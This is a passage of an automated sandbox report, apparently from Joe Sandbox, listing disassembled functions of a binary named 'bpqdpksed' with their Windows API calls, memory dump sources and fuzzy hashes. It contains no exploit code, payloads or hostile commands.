                                                                                                • Part of subcall function 00D80588: LeaveCriticalSection.KERNEL32(00E3170C,?,00D6D208,00E33540,00DA27E9,00000001,00000000,?,?,00DDEF39,?,?,00000000,00000001,?,00000001), ref: 00D805C5
                                                                                                • Part of subcall function 00DD3EF6: LoadStringW.USER32(00000066,?,00000FFF,00DFDCEC), ref: 00DD3F3E
                                                                                                • Part of subcall function 00DD3EF6: LoadStringW.USER32(?,?,00000FFF,?), ref: 00DD3F64
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                              • String ID: x3$x3$x3
                                                                                              • API String ID: 1072379062-3783253891
                                                                                              • Opcode ID: 9ef10311ea3a271e7bda4058ae48360e5fcb13b4e9e1289519df0b5c5e1b6ab6
                                                                                              • Instruction ID: 3c3c44f55fbce03e865f952204f5b52ff2d2721495389dd3f77b445edce4289c
                                                                                              • Opcode Fuzzy Hash: 9ef10311ea3a271e7bda4058ae48360e5fcb13b4e9e1289519df0b5c5e1b6ab6
                                                                                              • Instruction Fuzzy Hash: C2C1CD71A00149AFCB14EF69C881EBEB7B9EF58340F148069F955AB291DB70ED44CBB0
                                                                                              Function 00DCCA3D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00DCCAC6
                                                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00DCCB0C
                                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E32990,018565D0), ref: 00DCCB55
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Delete$InfoItem
                                                                                              • String ID: 0
                                                                                              • API String ID: 135850232-4108050209
                                                                                              • Opcode ID: c01620c2055a418f43ed86d6032abb22f97d8529137d4a52635c12c40698c99f
                                                                                              • Instruction ID: 0c19a1b3e39e1101685ba3f753cacc473914e0e68a2db0ec323d0f0dc5040bd5
                                                                                              • Opcode Fuzzy Hash: c01620c2055a418f43ed86d6032abb22f97d8529137d4a52635c12c40698c99f
                                                                                              • Instruction Fuzzy Hash: 0241AF705153429FD720DF64C846F2ABBE5EF84324F04461DEAA9D7291D730E804CB72
                                                                                              Function 00DF4D75 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00DFDCD0,00000000,?,?,?,?), ref: 00DF4E09
                                                                                              • GetWindowLongW.USER32 ref: 00DF4E26
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DF4E36
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long
                                                                                              • String ID: SysTreeView32
                                                                                              • API String ID: 847901565-1698111956
                                                                                              • Opcode ID: ac8a6f81fea5d16a078691d22f0cdfd8b2af0ce25c79ca121c9be1ac4a923c70
                                                                                              • Instruction ID: 96be34156c9db7a7bbdb30b6be79288ffd399a7fc70e09561ad8ae17bd58fc04
                                                                                              • Opcode Fuzzy Hash: ac8a6f81fea5d16a078691d22f0cdfd8b2af0ce25c79ca121c9be1ac4a923c70
                                                                                              • Instruction Fuzzy Hash: 0C315031110209AFDF219E78DC45BFB7BAAEB48334F298715FA75922D0D770A8509B70
                                                                                              Function 00DF4817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00DF489F
                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00DF48B3
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DF48D7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window
                                                                                              • String ID: SysMonthCal32
                                                                                              • API String ID: 2326795674-1439706946
                                                                                              • Opcode ID: 4a68dec56c860665922d13d040c2e89dd7ab805307f1bba538b8e6ed42b98851
                                                                                              • Instruction ID: 0de0477a408981c54fed4a15babaf6c466c52987b0f943555aea595a1f50fe7d
                                                                                              • Opcode Fuzzy Hash: 4a68dec56c860665922d13d040c2e89dd7ab805307f1bba538b8e6ed42b98851
                                                                                              • Instruction Fuzzy Hash: 0D219F3260021DAFEF158F90CC46FEB3B69EF48764F154114FB15AB190D6B1A8559BA0
                                                                                              Function 00DF4116 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00DF419F
                                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00DF41AF
                                                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00DF41D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$MoveWindow
                                                                                              • String ID: Listbox
                                                                                              • API String ID: 3315199576-2633736733
                                                                                              • Opcode ID: e0068d4bea32a5c2c28bd18b80ed37533148e05b4c69c477528a990c460d1ce3
                                                                                              • Instruction ID: 0f2a929e38b11f2f398cb659efbd7625feeb1178be42489a62baef10231209a8
                                                                                              • Opcode Fuzzy Hash: e0068d4bea32a5c2c28bd18b80ed37533148e05b4c69c477528a990c460d1ce3
                                                                                              • Instruction Fuzzy Hash: A421BE3261021CBBEB218F54DC84EBB376EEF99754F06C114FA059B190CA719C9287B0
                                                                                              Function 00DF4B4A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00DF4BAE
                                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00DF4BC3
                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00DF4BD0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: msctls_trackbar32
                                                                                              • API String ID: 3850602802-1010561917
                                                                                              • Opcode ID: f13a2ae70633e8575b1fc0e9bb68265e370741312bbfe846b4d3c3040cc2a293
                                                                                              • Instruction ID: 0d20eacdb041376c634b506a4863227d3ba85d3943b17e86227e5ea2d858240c
                                                                                              • Opcode Fuzzy Hash: f13a2ae70633e8575b1fc0e9bb68265e370741312bbfe846b4d3c3040cc2a293
                                                                                              • Instruction Fuzzy Hash: 2E11E03124020CBEEF215F69CC06FBB7BA8EF85B24F128518FB55E60A1D671D8219B30
                                                                                              Function 00DF61E1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00DF6220
                                                                                              • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00DF624D
                                                                                              • DrawMenuBar.USER32(?), ref: 00DF625C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$InfoItem$Draw
                                                                                              • String ID: 0
                                                                                              • API String ID: 3227129158-4108050209
                                                                                              • Opcode ID: bf4ead31e419e024e0b9dc49c820199bbe94d7e7d3b1d1e58da37d825c8692a4
                                                                                              • Instruction ID: ac21be029a222462a6bddd89c3354779952d36d2e6c47a11e5474636daf2ba85
                                                                                              • Opcode Fuzzy Hash: bf4ead31e419e024e0b9dc49c820199bbe94d7e7d3b1d1e58da37d825c8692a4
                                                                                              • Instruction Fuzzy Hash: F2017931500208AFDB109F50DC88BAA7BB5FB45310F04C095EA49DA250DB308984EF30
                                                                                              Function 00DC090F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e1630d2c0145a88dcd943aec86de143294935036829b2cdd72ce751e89220f26
                                                                                              • Instruction ID: a66002c6ea45e1a969d48295974671373158d0829549bc9090eb8de0b87c3146
                                                                                              • Opcode Fuzzy Hash: e1630d2c0145a88dcd943aec86de143294935036829b2cdd72ce751e89220f26
                                                                                              • Instruction Fuzzy Hash: D0C13975A0020AEFDB14CF94C894FAABBB5FF48704F248598E515EB251D731EE81DBA0
                                                                                              Function 00D94210 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: __alldvrm$_strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 1036877536-0
                                                                                              • Opcode ID: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                                                              • Instruction ID: 7064350c3e3afbd39dc80885fafdc1dd784d1729b4b06874ccacbb5f7d2605de
                                                                                              • Opcode Fuzzy Hash: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                                                              • Instruction Fuzzy Hash: 37A11672A003869FDF25CF68C891FBEBBE4EF55310F1842A9E5859B243D6749942C770
                                                                                              Function 00DC0CC6 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E00BD4,?), ref: 00DC0E80
                                                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E00BD4,?), ref: 00DC0E98
                                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,00DFDCE0,000000FF,?,00000000,00000800,00000000,?,00E00BD4,?), ref: 00DC0EBD
                                                                                              • _memcmp.LIBVCRUNTIME ref: 00DC0EDE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FromProg$FreeTask_memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 314563124-0
                                                                                              • Opcode ID: b10fbc1b51344d6ab709384f89fcba47d0c402d6da6e1b5d02596b50af22e934
                                                                                              • Instruction ID: 2d0a67d90ccf64127b0f72384341433177cfe652c8e97df62285984bf940d082
                                                                                              • Opcode Fuzzy Hash: b10fbc1b51344d6ab709384f89fcba47d0c402d6da6e1b5d02596b50af22e934
                                                                                              • Instruction Fuzzy Hash: CB81E971A0020AEFCB04DF94C984EEEBBB9FF89315F244558F516AB250DB71AE45CB60
                                                                                              Function 00DE2433 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00DE245A
                                                                                              • WSAGetLastError.WSOCK32 ref: 00DE2468
                                                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00DE24E7
                                                                                              • WSAGetLastError.WSOCK32 ref: 00DE24F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$socket
                                                                                              • String ID:
                                                                                              • API String ID: 1881357543-0
                                                                                              • Opcode ID: 00a10ef5dd98b6060904a89f5c17a9a790560afcd8bdd157f9a178abba2fa6b6
                                                                                              • Instruction ID: acbe27fa7e5e04c786d5156376dcfdfe11fceade3b89688d090dcbed2c9301de
                                                                                              • Opcode Fuzzy Hash: 00a10ef5dd98b6060904a89f5c17a9a790560afcd8bdd157f9a178abba2fa6b6
                                                                                              • Instruction Fuzzy Hash: 3141BF78600200AFE720AF64C896F3A77A5EB04708F58C448F95A9F3D2D672ED41CBB0
                                                                                              Function 00DF6BD7 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00DF6C41
                                                                                              • ScreenToClient.USER32(?,?), ref: 00DF6C74
                                                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00DF6CE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                              • String ID:
                                                                                              • API String ID: 3880355969-0
                                                                                              • Opcode ID: 5b877d689961a8496ad9d2e313aaa8db20a8aacf2d8429fda4bb5c25c8e64b7a
                                                                                              • Instruction ID: 3d7760a2e52e521921741da4dfbb00112aaaf519d0370201c45c332e9eee8196
                                                                                              • Opcode Fuzzy Hash: 5b877d689961a8496ad9d2e313aaa8db20a8aacf2d8429fda4bb5c25c8e64b7a
                                                                                              • Instruction Fuzzy Hash: D2514D70A0020CEFCB10DF64C980ABE7BB6EF45360F158159FAA59B690D770ED81CBA0
                                                                                              Function 00DD6033 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DD60DD
                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00DD6103
                                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00DD6128
                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00DD6154
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 3321077145-0
                                                                                              • Opcode ID: c94c2de6b4291784df1222a85e8427f69b5ad161730d3fbd377edd6d1e7f04bd
                                                                                              • Instruction ID: 19b9a98c232a84a39e44edefda51f82ea3b89d28df748cc70a63d2f73932c6f6
                                                                                              • Opcode Fuzzy Hash: c94c2de6b4291784df1222a85e8427f69b5ad161730d3fbd377edd6d1e7f04bd
                                                                                              • Instruction Fuzzy Hash: 66414B39600610DFCB11EF55C444A5EBBE2EF49720B19C489E94AAB362CB36FD41DBB1
                                                                                              Function 00DF2039 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32 ref: 00DF204A
                                                                                                • Part of subcall function 00DC42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DC42E6
                                                                                                • Part of subcall function 00DC42CC: GetCurrentThreadId.KERNEL32 ref: 00DC42ED
                                                                                                • Part of subcall function 00DC42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DC2E43), ref: 00DC42F4
                                                                                              • GetCaretPos.USER32(?), ref: 00DF205E
                                                                                              • ClientToScreen.USER32(00000000,?), ref: 00DF20AB
                                                                                              • GetForegroundWindow.USER32 ref: 00DF20B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                              • String ID:
                                                                                              • API String ID: 2759813231-0
                                                                                              • Opcode ID: 2aa36329cb26ce959f412d265a672847cff8f489c71788252658b56ff2b2c9fa
                                                                                              • Instruction ID: 8a36a42727bc1d574b56fcf463f859ba935f826c9663192d258b9f55b80fc27f
                                                                                              • Opcode Fuzzy Hash: 2aa36329cb26ce959f412d265a672847cff8f489c71788252658b56ff2b2c9fa
                                                                                              • Instruction Fuzzy Hash: DA311E75D00209AFDB04EFAAC9818BEB7F9EF58304B14846AE515E7311EA71DE45CBB0
                                                                                              Function 00DCE7C1 Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D64154: _wcslen.LIBCMT ref: 00D64159
                                                                                              • _wcslen.LIBCMT ref: 00DCE7F7
                                                                                              • _wcslen.LIBCMT ref: 00DCE80E
                                                                                              • _wcslen.LIBCMT ref: 00DCE839
                                                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00DCE844
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$ExtentPoint32Text
                                                                                              • String ID:
                                                                                              • API String ID: 3763101759-0
                                                                                              • Opcode ID: bde044b01014ccd18edcdf9103396e114c1319a08ea6ccc80fc94b43122a20d1
                                                                                              • Instruction ID: 6f7d115f57aabb1c31cdede988d864be9da331f697f06a3413de9f33b592356a
                                                                                              • Opcode Fuzzy Hash: bde044b01014ccd18edcdf9103396e114c1319a08ea6ccc80fc94b43122a20d1
                                                                                              • Instruction Fuzzy Hash: 5B2183B1D01315AFDB10AFA8C981BAEB7F8EF95760F144069E904BB281D6749E4187B1
                                                                                              Function 00DC8184 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
